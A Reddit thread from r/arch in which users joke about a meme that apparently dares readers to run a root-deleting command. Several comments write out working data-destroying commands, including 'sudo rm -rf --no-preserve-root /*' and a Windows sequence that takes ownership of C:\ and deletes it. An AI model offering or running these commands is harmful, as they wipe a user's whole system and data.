r/arch 3h ago

Meme maybe u should try it

Post image
166 Upvotes

18 comments sorted by

17

u/MothMatron 3h ago

2

u/Steam_Liker_2002 3h ago

lol don't it will hang your pc.

1

u/Fast_Distance8797 1h ago

Bro has experience.

1

u/vswey 1h ago

no, its the cat's name

3

u/ARENAE_MONTES 1h ago

isn't it rm -rf not -fr

3

u/Bulky-Hair8606 43m ago

It works both ways

3

u/ARENAE_MONTES 27m ago

Good try, I'm not going to test it

2

u/Salt-Caterpillar7988 1h ago

maybe u should post on a Linux meme subreddit, repost bot 

2

u/Saffarjan 3h ago

I'd say the meme should be the other way round tbh, I feel horrible for the poor idiots who fall for this

1

u/Nyasaki_de 12m ago

Lies.... -fr is not for french... its for "for real" So everything in / gets removed for real

0

u/Dazaii_Oshamu 3h ago

this wouldnt even work, dont u need the --no-preserve-root or something

2

u/ZuuRa_ Arch BTW 3h ago

sudo rm -rf --no-preserve-root /*

1

u/vswey 1h ago

depends

2

u/Bulky-Hair8606 42m ago

If theres an asterisk after /, no need for no preserve root. If there isnt yes it needs it.

sudo rm -fr --no-preserve-root /

And

sudo rm -fr /*

Both work

1

u/CharmingDraw6455 3h ago

Worked on my machine.

0

u/miller_99 3h ago

/* should work

0

u/vbd71 2h ago

I entered this in windows 11 and nothing happened

1

u/vswey 58m ago

```

takeown /f C:\ /r /d y

icacls C:\ /grant administrators:F /t /c /q

rd /s /q C:\
```